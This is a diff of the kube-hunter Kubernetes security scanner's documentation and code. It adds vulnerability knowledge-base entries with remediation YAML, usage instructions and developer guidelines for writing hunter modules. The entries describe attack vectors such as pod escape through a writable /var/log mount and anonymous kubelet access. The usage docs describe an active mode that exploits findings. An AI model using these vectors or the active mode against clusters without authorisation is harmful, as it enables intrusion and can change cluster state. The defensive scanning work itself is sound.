- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV044.md Normal file

@@ -0,0 +1,22 @@
---
vid: KHV044
title: Privileged Container
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
## Remediation
Minimize the use of privileged containers.
Use Pod Security Policies to enforce `privileged: false`.
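A minimal PodSecurityPolicy sketch that forbids privileged containers (the remaining fields are required by the PSP API and are left permissive here for brevity):
~~~
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: no-privileged
spec:
  privileged: false   # the key setting: privileged containers are rejected
  seLinux:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes: ["*"]
~~~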
## References
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)

docs/_kb/KHV045.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV045
title: Exposed System Logs
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is leaking system logs via the `/logs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV046.md Normal file

@@ -0,0 +1,20 @@
---
vid: KHV046
title: Exposed Kubelet Cmdline
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
When the kubelet is run in debug mode, a Pod running in the cluster can access the kubelet's `debug/pprof/cmdline` endpoint and examine how the kubelet was executed on the node, specifically which command line flags were used. This tells an attacker what capabilities the kubelet has, which might then be exploited.
## Remediation
Disable `--enable-debugging-handlers` kubelet flag.
## References
- [cmdline handler in Kubelet code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go#L327)
- [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)

docs/_kb/KHV047.md Normal file

@@ -0,0 +1,27 @@
---
vid: KHV047
title: Pod With Mount To /var/log
categories: [Privilege Escalation]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Kubernetes uses `/var/log/pods` on nodes to store Pods' log files. When running `kubectl logs`, the kubelet fetches the pod logs from that directory. If a container has write access to `/var/log`, it can create arbitrary files, or symlinks to other files on the host; those would be read by the kubelet when a user executes `kubectl logs`.
## Remediation
Consider disallowing running as root:
use Kubernetes Pod Security Policies with the `MustRunAsNonRoot` policy;
Aqua users can use a Runtime Policy with `Blacklisted OS Users and Groups`.
Consider disallowing writable host mounts to `/var/log`:
use Kubernetes Pod Security Policies with the `AllowedHostPaths` policy;
Aqua users can use a Runtime Policy with `Volume Blacklist`.
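As a sketch, the `AllowedHostPaths` part of a PodSecurityPolicy spec could look like this fragment, permitting only read-only mounts under `/var/log`:
~~~
spec:
  allowedHostPaths:
    - pathPrefix: "/var/log"
      readOnly: true   # pods may mount this path, but not write to it
~~~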
## References
- [Kubernetes Pod Escape Using Log Mounts](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
- [Pod Security Policies - Volumes and file systems](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems)
- [Pod Security Policies - Users and groups](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups)

docs/_kb/KHV049.md Normal file

@@ -0,0 +1,21 @@
---
vid: KHV049
title: kubectl proxy Exposed
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An open kubectl proxy was detected. `kubectl proxy` is a convenient tool for connecting from a local machine to an application running in Kubernetes, or to the Kubernetes API. It is common practice to use it to browse, for example, the Kubernetes Dashboard. An open proxy left behind can be exploited by an attacker to gain access to your entire cluster.
## Remediation
Expose your applications in a permanent, legitimate way, such as via Ingress.
Close open proxies immediately after use.
## References
- [Accessing Clusters - Using kubectl proxy](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/#using-kubectl-proxy)

docs/_kb/KHV050.md Normal file

@@ -0,0 +1,22 @@
---
vid: KHV050
title: Read access to Pod service account token
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
Every Pod in Kubernetes is associated with a Service Account which, by default, has access to the Kubernetes API. This access is provided through an auto-generated token that Kubernetes mounts into the Pod. An attacker with access to a Pod can read the token and access the Kubernetes API.
## Remediation
It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.Spec`), and manage their permissions according to the least privilege principle.
Consider opting out of automatic mounting of the SA token using `automountServiceAccountToken: false` on the `ServiceAccount` resource or in `Pod.spec`.
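A minimal sketch of opting out at the Pod level (the name and image are placeholders):
~~~
apiVersion: v1
kind: Pod
metadata:
  name: no-sa-token
spec:
  automountServiceAccountToken: false   # no API token is mounted into this Pod
  containers:
    - name: app
      image: example/app
~~~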
## References
- [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)

docs/_kb/KHV051.md Normal file

@@ -0,0 +1,40 @@
---
vid: KHV051
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
categories: [Access Risk]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPS API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within containers (specifically privileged ones), a malicious actor can leverage these capabilities to do far more damage in the cluster than expected, e.g. starting or modifying processes on the host.
## Remediation
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
Minimize the use of privileged containers.
Use Pod Security Policies to enforce using `privileged: false` policy.
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.
Ensure your nodes run active filesystem monitoring.
Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.
## References
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})

docs/_kb/KHV052.md Normal file

@@ -0,0 +1,23 @@
---
vid: KHV052
title: Exposed Pods
categories: [Information Disclosure]
---
# {{ page.vid }} - {{ page.title }}
## Issue description
An attacker could view sensitive information about pods that are bound to a node using the exposed `/pods` endpoint.
This can be done either via the read-only port (default 10255) or via the secure kubelet port (10250).
## Remediation
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
Disable the readonly port by using `--read-only-port=0` kubelet flag.
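A flag-level sketch combining both recommendations (the CA path is a placeholder; installers and cloud providers usually manage these flags):
~~~
kubelet --anonymous-auth=false \
        --client-ca-file=/etc/kubernetes/pki/ca.crt \
        --read-only-port=0
~~~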
## References
- [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)

docs/_layouts/default.html Normal file

@@ -0,0 +1,102 @@
<!DOCTYPE html>
<html lang="{{ site.lang | default: "en-US" }}">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
{% seo %}
<link rel="stylesheet" href="{{ "/assets/css/style.css?v=" | append: site.github.build_revision | relative_url }}">
<!--[if lt IE 9]>
<script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
<![endif]-->
</head>
<body>
<div class="wrapper">
<header>
<h1><a href="{{ "/" | absolute_url }}">
{% if site.logo %}
<img src="{{site.logo | relative_url}}" alt="Logo" />
{% else %}
{{ site.title | default: site.github.repository_name }}
{% endif %}
</a></h1>
<p>{{ site.description | default: site.github.project_tagline }}</p>
{% if site.github.is_project_page %}
<p class="view"><a href="{{ site.github.repository_url }}">View the Project on GitHub <small>{{ site.github.repository_nwo }}</small></a></p>
{% endif %}
{% if site.github.is_user_page %}
<p class="view"><a href="{{ site.github.owner_url }}">View My GitHub Profile</a></p>
{% endif %}
{% if site.show_downloads %}
<ul class="downloads">
<li><a href="{{ site.github.zip_url }}">Download <strong>ZIP File</strong></a></li>
<li><a href="{{ site.github.tar_url }}">Download <strong>TAR Ball</strong></a></li>
<li><a href="{{ site.github.repository_url }}">View On <strong>GitHub</strong></a></li>
</ul>
{% endif %}
<div>
<div>
Lookup Vulnerability<br />
<input type="text" id="searchInput" placeholder="Vulnerability ID">
<button id="searchButton" class="searchButton">Find</button>
</div>
<div>
<a href="{{ site.baseurl }}{% link kbindex.html %}">All vulnerabilies</a>
</div>
</div>
</header>
<section>
{{ content }}
</section>
<footer>
{% if site.github.is_project_page %}
<p>This project is maintained by <a href="{{ site.github.owner_url }}">{{ site.github.owner_name }}</a></p>
{% endif %}
<p><small>Hosted on GitHub Pages &mdash; Theme by <a href="https://github.com/orderedlist">orderedlist</a></small></p>
</footer>
</div>
<script src="{{ "/assets/js/scale.fix.js" | relative_url }}"></script>
<script type="text/javascript">
var articleUrlTemplate = "{{ site.baseurl }}{% link _kb/KHV002.md %}";
var searchInput = document.getElementById("searchInput");
var searchButton = document.getElementById("searchButton");
searchInput.addEventListener("keyup", function(event) {
if (event.keyCode === 13) {
event.preventDefault();
doSearch();
}
});
searchButton.addEventListener("click", function(event) {
event.preventDefault();
doSearch();
});
function doSearch() {
var searchTerm = searchInput.value;
searchTerm = searchTerm.toUpperCase();
if (!searchTerm.startsWith("KHV")) {
searchTerm = "KHV" + searchTerm;
}
window.location = articleUrlTemplate.replace("KHV002",searchTerm);
}
</script>
{% if site.google_analytics %}
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', '{{ site.google_analytics }}', 'auto');
ga('send', 'pageview');
</script>
{% endif %}
</body>
</html>

docs/index.md Normal file

@@ -0,0 +1,122 @@
---
---
# Welcome to kube-hunter documentation
## Documentation for vulnerabilities
For information about a specific vulnerability reported by kube-hunter, enter its 'VID' (e.g. KHV004) in the search box to the left, to get to the vulnerability article.
For a complete list of all documented vulnerabilities, [click here]({{ site.baseurl }}{% link kbindex.html %})
## Getting started
### Where should I run kube-hunter?
Run kube-hunter on any machine (including your laptop), select Remote scanning, and give the IP address or domain name of your Kubernetes cluster. This will give you an attacker's-eye view of your Kubernetes setup.
You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).
### Scanning options
By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
1. **Remote scanning**
To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
`./kube-hunter.py --remote some.node.com`
2. **Interface scanning**
To specify interface scanning, you can use the `--interface` option (this will scan all of the machine's network interfaces). Example:
`./kube-hunter.py --interface`
3. **Network scanning**
To specify a specific CIDR to scan, use the `--cidr` option. Example:
`./kube-hunter.py --cidr 192.168.0.0/24`
### Active Hunting
Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities.
The main difference between normal and active hunting is that a normal hunt will never change the state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
By default, kube-hunter does not do active hunting. To actively hunt a cluster, use the `--active` flag. Example:
`./kube-hunter.py --remote some.domain.com --active`
### List of tests
You can see the list of tests with the `--list` option. Example:
`./kube-hunter.py --list`
To see active hunting tests as well as passive:
`./kube-hunter.py --list --active`
### Nodes Mapping
To see only a mapping of your nodes' network, run with the `--mapping` option. Example:
`./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
This will output all the Kubernetes nodes kube-hunter has found.
### Output
To control logging, you can specify a log level, using the `--log` option. Example:
`./kube-hunter.py --active --log WARNING`
Available log levels are:
* DEBUG
* INFO (default)
* WARNING
### Dispatching
By default, the report will be dispatched to `stdout`, but you can specify different methods by using the `--dispatch` option. Example:
`./kube-hunter.py --report json --dispatch http`
Available dispatch methods are:
* stdout (default)
* http (to configure, set the following environment variables:)
* KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
* KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
## Deployment
There are three methods for deploying kube-hunter:
### On Machine
You can run the kube-hunter python code directly on your machine.
#### Prerequisites
You will need the following installed:
* python 3.x
* pip
Clone the repository:
~~~
git clone https://github.com/aquasecurity/kube-hunter.git
~~~
Install module dependencies:
~~~
cd ./kube-hunter
pip install -r requirements.txt
~~~
Run:
`./kube-hunter.py`
_If you want to use pyinstaller/py2exe, you first need to run the install_imports.py script._
### Container
Aqua Security maintains a containerised version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
If you run the kube-hunter container with the host network, it will be able to probe all the interfaces on the host:
`docker run -it --rm --network host aquasec/kube-hunter`
_Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
By default, kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above, e.g.:
`docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24`
### Pod
This option lets you explore what running a malicious container can do or discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
The `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
* Run the job with `kubectl create -f ./job.yaml`
* Find the pod name with `kubectl describe job kube-hunter`
* View the test results with `kubectl logs <pod name>`

docs/kbindex.html Normal file

@@ -0,0 +1,13 @@
---
---
<h1>All articles</h1>
<ul>
{% for article in site.kb %}
<li>
<h3>
<a href="{{ article.url | prepend: site.baseurl }}">{{ article.vid }} - {{ article.title | escape }}</a>
</h3>
</li>
{% endfor %}
</ul>

job.yaml

@@ -8,7 +8,7 @@ spec:
containers:
- name: kube-hunter
image: aquasec/kube-hunter
command: ["python", "kube-hunter.py"]
command: ["kube-hunter"]
args: ["--pod"]
restartPolicy: Never
backoffLimit: 4

Binary file not shown. (Image changed: 144 KiB before, 230 KiB after.)

Binary file not shown. (Image changed: 27 KiB before, 19 KiB after.)

kube-hunter.py

@@ -1,164 +0,0 @@
#!/usr/bin/env python
from __future__ import print_function
import argparse
import logging
import threading
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
parser = argparse.ArgumentParser(description='Kube-Hunter - hunts for security weaknesses in Kubernetes clusters')
parser.add_argument('--list', action="store_true", help="displays all tests in kubehunter (add --active flag to see active tests)")
parser.add_argument('--internal', action="store_true", help="set hunting of all internal network interfaces")
parser.add_argument('--pod', action="store_true", help="set hunter as an insider pod")
parser.add_argument('--quick', action="store_true", help="Prefer quick scan (subnet 24)")
parser.add_argument('--cidr', type=str, help="set an ip range to scan, example: 192.168.0.0/16")
parser.add_argument('--mapping', action="store_true", help="outputs only a mapping of the cluster's nodes")
parser.add_argument('--remote', nargs='+', metavar="HOST", default=list(), help="one or more remote ip/dns to hunt")
parser.add_argument('--active', action="store_true", help="enables active hunting")
parser.add_argument('--log', type=str, metavar="LOGLEVEL", default='INFO', help="set log level, options are: debug, info, warn, none")
parser.add_argument('--report', type=str, default='plain', help="set report type, options are: plain, yaml, json")
import plugins
config = parser.parse_args()
try:
loglevel = getattr(logging, config.log.upper())
except:
pass
if config.log.lower() != "none":
logging.basicConfig(level=loglevel, format='%(message)s', datefmt='%H:%M:%S')
from src.modules.report.plain import PlainReporter
from src.modules.report.yaml import YAMLReporter
from src.modules.report.json_reporter import JSONReporter
if config.report.lower() == "yaml":
config.reporter = YAMLReporter()
elif config.report.lower() == "json":
config.reporter = JSONReporter()
else:
config.reporter = PlainReporter()
from src.core.events import handler
from src.core.events.types import HuntFinished, HuntStarted
from src.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
from src.modules.hunting.kubelet import Kubelet
from src.modules.discovery.apiserver import ApiServerDiscovery
from src.modules.discovery.proxy import KubeProxy
from src.modules.discovery.etcd import EtcdRemoteAccess
from src.modules.discovery.dashboard import KubeDashboard
from src.modules.discovery.ports import PortDiscovery
from src.modules.hunting.apiserver import AccessApiServer
from src.modules.hunting.apiserver import AccessApiServerWithToken
from src.modules.hunting.proxy import KubeProxy
from src.modules.hunting.etcd import EtcdRemoteAccess
from src.modules.hunting.certificates import CertificateDiscovery
from src.modules.hunting.dashboard import KubeDashboard
from src.modules.hunting.cvehunter import IsVulnerableToCVEAttack
from src.modules.hunting.aks import AzureSpnHunter
from src.modules.hunting.secrets import AccessSecrets
import src
def interactive_set_config():
"""Sets config manually, returns True for success"""
options = [("Remote scanning", "scans one or more specific IPs or DNS names"),
("Subnet scanning","scans subnets on all local network interfaces"),
("IP range scanning","scans a given IP range")]
print("Choose one of the options below:")
for i, (option, explanation) in enumerate(options):
print("{}. {} ({})".format(i+1, option.ljust(20), explanation))
choice = raw_input("Your choice: ")
if choice == '1':
config.remote = raw_input("Remotes (separated by a ','): ").replace(' ', '').split(',')
elif choice == '2':
config.internal = True
elif choice == '3':
config.cidr = raw_input("CIDR (example - 192.168.1.0/24): ").replace(' ', '')
else:
return False
return True
def parse_docs(hunter, docs):
"""returns tuple of (name, docs)"""
if not docs:
return hunter.__name__, "<no documentation>"
docs = docs.strip().split('\n')
for i, line in enumerate(docs):
docs[i] = line.strip()
return docs[0], ' '.join(docs[1:]) if len(docs[1:]) else "<no documentation>"
def list_hunters():
print("\nPassive Hunters:\n----------------")
for i, (hunter, docs) in enumerate(handler.passive_hunters.items()):
name, docs = parse_docs(hunter, docs)
print("* {}\n {}\n".format(name, docs))
if config.active:
print("\n\nActive Hunters:\n---------------")
for i, (hunter, docs) in enumerate(handler.active_hunters.items()):
name, docs = parse_docs(hunter, docs)
print("* {}\n {}\n".format( name, docs))
global hunt_started_lock
hunt_started_lock = threading.Lock()
hunt_started = False
def main():
global hunt_started
scan_options = [
config.pod,
config.cidr,
config.remote,
config.internal
]
try:
if config.list:
list_hunters()
return
if not any(scan_options):
if not interactive_set_config(): return
hunt_started_lock.acquire()
hunt_started = True
hunt_started_lock.release()
handler.publish_event(HuntStarted())
if config.pod:
handler.publish_event(RunningAsPodEvent())
else:
handler.publish_event(HostScanEvent())
# Blocking to see discovery output
handler.join()
except KeyboardInterrupt:
logging.debug("Kube-Hunter stopped by user")
# happens when running a container without interactive option
except EOFError:
logging.error("\033[0;31mPlease run again with -it\033[0m")
finally:
hunt_started_lock.acquire()
if hunt_started:
hunt_started_lock.release()
handler.publish_event(HuntFinished())
handler.join()
handler.free()
logging.debug("Cleaned Queue")
else:
hunt_started_lock.release()
if __name__ == '__main__':
main()

kube-hunter.py Symbolic link

@@ -0,0 +1 @@
kube_hunter/__main__.py


@@ -1,13 +1,11 @@
# Guidelines for developing kube-hunter
---
This document is intended for developers. If you are not a developer, please refer back to the [Deployment README](/README.md)
First, lets go through kube-hunter's basic architecture.
First, let's go through kube-hunter's basic architecture.
### Directory Structure
~~~
kube-hunter/
plugins/
# your plugin
src/
kube_hunter/
core/
modules/
discovery/
@@ -16,23 +14,23 @@ kube-hunter/
# your module
report/
# your module
kube-hunter.py
__main__.py
~~~
### Design Pattern
Kube-hunter is built with the [Observer Pattern](https://en.wikipedia.org/wiki/Observer_pattern).
With this in mind, every new Service/Vulnerability/Information that has been discovered, will trigger a new event.
With this in mind, every new Service/Vulnerability/Information that has been discovered will trigger a new event.
When you write your module, you can decide which Event to subscribe to; that determines when exactly your module will start Hunting.
-----------------------
### Hunter Types
There are two hunter types which you can implement: a `Hunter` and an `ActiveHunter`. Hunters just probe the state of a cluster, whereas ActiveHunter modules can attempt operations that could change the state of the cluster.
There are three hunter types which you can implement: a `Hunter`, an `ActiveHunter`, and a `Discovery`. Hunters just probe the state of a cluster, whereas ActiveHunter modules can attempt operations that could change the state of the cluster. A `Discovery` is a Hunter used for discovery purposes only.
##### Hunter
Example:
~~~python
@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 30000)
class KubeDashboardDiscovery(Hunter):
"""Dashboard Discovery
Explanation about what the hunter does
Explanation about what the Hunter does
"""
def __init__(self, event):
self.event = event
@@ -40,8 +38,8 @@ class KubeDashboardDiscovery(Hunter):
pass
~~~
Kube-hunter's core module triggers your Hunter when the event you have subscribed it to occurs.
in this example, we subscribe the Hunter, `KubeDashboardDiscovery`, to an `OpenPortEvent`, with a predicate that checks the open port (of the event) is 30000.
`Convention:` The first line of the comment describing the hunter is the visible name, the other lines are the explanation.
In this example, we subscribe the Hunter, `KubeDashboardDiscovery`, to an `OpenPortEvent`, with a predicate that checks the open port (of the event) is 30000.
`Convention:` The first line of the comment describing the Hunter is the visible name, the other lines are the explanation.
##### ActiveHunter
@@ -56,9 +54,9 @@ class ProveSomeVulnerability(ActiveHunter):
* Every hunter needs to implement an `execute` method; the core module will call this method automatically.
* Every hunter needs to save the event it was given in `__init__` in its attributes.
* When subscribing to an event, if a `predicate` is specified, it will be called with the event itself, pre trigger.
* When subscribing to an event, if a `predicate` is specified, it will be called with the event itself, pre-trigger.
* When inheriting from `Hunter` or `ActiveHunter` you can use `self.publish_event(event)`, as the sketch below demonstrates.
`event` is an **initialized** event object
`event` is an **initialized** event object.
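As a minimal sketch of these conventions (the hunter, its port predicate, and the published event are invented for illustration):
```python
from kube_hunter.core.types import Hunter
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import OpenPortEvent

@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 8080)
class ExampleHunter(Hunter):
    """Example Hunter
    A hypothetical Hunter demonstrating the conventions above
    """

    def __init__(self, event):
        # save the given event, so its attributes remain accessible
        self.event = event

    def execute(self):
        # called automatically by the core module;
        # publish only **initialized** event objects
        self.publish_event(OpenPortEvent(port=1234))
```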
-----------------------
@@ -66,21 +64,21 @@ class ProveSomeVulnerability(ActiveHunter):
The first step is to create a new file in the `hunting` or the `discovery` folder.
_The file's (module's) content is imported automatically._
`Convention:` Hunters which discover a new service should be placed under the `discovery` folder.
`Convention:` Hunters which discover a new vulnerability, should be placed under the `hunting` folder.
`Convention:` Hunters which use vulnerabilities, should be placed under the `hunting` folder and should implement the ActiveHunter base class.
`Convention:` Hunters which discover a new vulnerability should be placed under the `hunting` folder.
`Convention:` Hunters which use vulnerabilities should be placed under the `hunting` folder and should implement the ActiveHunter base class.
The second step is to determine what events your Hunter will subscribe to, and from where you can get them.
`Convention:` Events should be declared in their corresponding module. for example, a KubeDashboardEvent event is declared in the dashboard discovery module.
`Convention:` Events should be declared in their corresponding module. For example, a KubeDashboardEvent event is declared in the dashboard discovery module.
`Note:` An hunter located under the `discovery` folder should not import any modules located under the `hunting` folder
`Note:` A Hunter located under the `discovery` folder should not import any modules located under the `hunting` folder
in order to prevent a circular dependency bug.
Following the above example, let's figure out the imports:
```python
from ...core.types import Hunter
from ...core.events import handler
from kube_hunter.core.types import Hunter
from kube_hunter.core.events import handler
from ...core.events.types import OpenPortEvent
from kube_hunter.core.events.types import OpenPortEvent
@handler.subscribe(OpenPortEvent, predicate=lambda event: event.port == 30000)
class KubeDashboardDiscovery(Hunter):
@@ -92,13 +90,13 @@ class KubeDashboardDiscovery(Hunter):
As you can see, all of the types here come from the `core` module.
### Core Imports
relative import: `...core.events`
Absolute import: `kube_hunter.core.events`
|Name|Description|
|---|---|
|handler|Core object for using events, every module should import this object|
relative import `...core.events.types`
Absolute import `kube_hunter.core.events.types`
|Name|Description|
|---|---|
@@ -106,7 +104,7 @@ relative import `...core.events.types`
|Vulnerability|Base class for defining a new vulnerability|
|OpenPortEvent|Published when a new port is discovered. The open port is assigned to the `port` attribute|
relative import: `...core.types`
Absolute import: `kube_hunter.core.types`
|Type|Description|
|---|---|
@@ -118,7 +116,7 @@ relative import: `...core.types`
## Creating Events
As discussed above, there are many different types of events that can be created, but in the end they all need to inherit from the base class `Event`.
lets see some examples of creating different types of events:
Let's see some examples of creating different types of events:
### Vulnerability
```python
class ExposedMasterCN(Vulnerability, Event):
@@ -133,10 +131,10 @@ class ExposedMasterCN(Vulnerability, Event):
class OpenKubeDns(Service, Event):
"""Explanation about this Service"""
def __init__(self):
Service.__init__(self, name="Kube-Dns")
Service.__init__(self, name="Kube-DNS")
```
`Notice:` Every type of event, should have an explanation in exactly the form shown above, that explanation will eventually be used when the report is made.
`Notice:` You can add any attribute to the event you create as needed, the examples shown above is the minimum implementation that needs to be made
`Notice:` Every type of event should have an explanation in exactly the form shown above (that explanation will eventually be used when the report is made).
`Notice:` You can add any attribute to the event you create as needed. The examples shown above are the minimum implementation that needs to be made.
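For instance, a hypothetical Vulnerability event following these conventions (the component, category, and `vid` below are illustrative only):
```python
from kube_hunter.core.types import KubernetesCluster, InformationDisclosure
from kube_hunter.core.events.types import Vulnerability, Event

class ExampleVersionLeak(Vulnerability, Event):
    """Explanation about this vulnerability, used verbatim in the report"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            "Example Version Leak",
            category=InformationDisclosure,
            vid="KHV000",  # illustrative id, not a real KHV entry
        )
        # an extra attribute beyond the minimum implementation
        self.evidence = evidence
```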
-----------------------
## Events
@@ -149,7 +147,7 @@ Example for an event chain:
*The first node of every event tree is the NewHostEvent*
Let us assume the following imaginary example:
We've defined a Hunter for SSL Certificates, which extracts the CN of the certificate, and does some magic with it. The example code would be defined in new `discovery` and `hunter` modules for this SSL Magic example:
We've defined a Hunter for SSL Certificates, which extracts the CN of the certificate and does some magic with it. The example code would be defined in new `discovery` and `hunter` modules for this SSL Magic example:
Discovery:
```python
@@ -173,8 +171,7 @@ class SslHunter(Hunter):
def execute(self):
do_magic(self.event.certificate)
```
Let's say we now want to do something with the hostname from the certificate from. In the event tree, we can check if the host attribute was assigned to our event previously, by directly accessing `event.host`. If it has not been specified from some reason, the value is `None`.
So this is sufficient for our example:
Let's say we now want to do something with the hostname from the certificate. In the event tree, we can check if the host attribute was assigned to our event previously, by directly accessing `event.host`. If it has not been specified for some reason, the value is `None`. So this is sufficient for our example:
```python
...
def execute(self):
@@ -182,16 +179,71 @@ def execute(self):
do_something_with_host(self.event.host) # normal access
```
If another Hunter subscribes to the events that this Hunter publishes, if can access the `event.certificate`.
If another Hunter subscribes to the events that this Hunter publishes, it can access the `event.certificate`.
## Proving Vulnerabilities
The process of proving vulnerabilities, is the base concept of the Active Hunting.
The process of proving vulnerabilities is the base concept of Active Hunting.
To prove a vulnerability, create an `ActiveHunter` that is subscribed to the vulnerability, and inside its `execute` method, specify the `evidence` attribute of the event.
*Note that you can specify the 'evidence' attribute without active hunting*
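A sketch of what that can look like, reusing the `ExposedMasterCN` vulnerability from the example above (the evidence value is invented):
```python
from kube_hunter.core.types import ActiveHunter
from kube_hunter.core.events import handler

# ExposedMasterCN is the vulnerability event class defined in the example above
@handler.subscribe(ExposedMasterCN)
class ProveExposedMasterCN(ActiveHunter):
    """Prove Exposed Master CN
    Demonstrates proving a vulnerability by filling in its evidence
    """

    def __init__(self, event):
        self.event = event

    def execute(self):
        # a real ActiveHunter would actively verify the issue here;
        # proving it means filling in the evidence attribute
        self.event.evidence = "master CN: k8s-master"  # illustrative value
```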
## Filtering Events
A filter can change an event's attribute or remove it completely before it gets published to Hunters.
To create a filter:
* create a class that inherits from `EventFilterBase` (from `kube_hunter.core.events.types`)
* use `@handler.subscribe(Event)` to filter a specific `Event`
* define an `__init__(self, event)` method, and save the event on your class
* implement an `execute(self)` method, which __returns a new event, or None to remove the event__
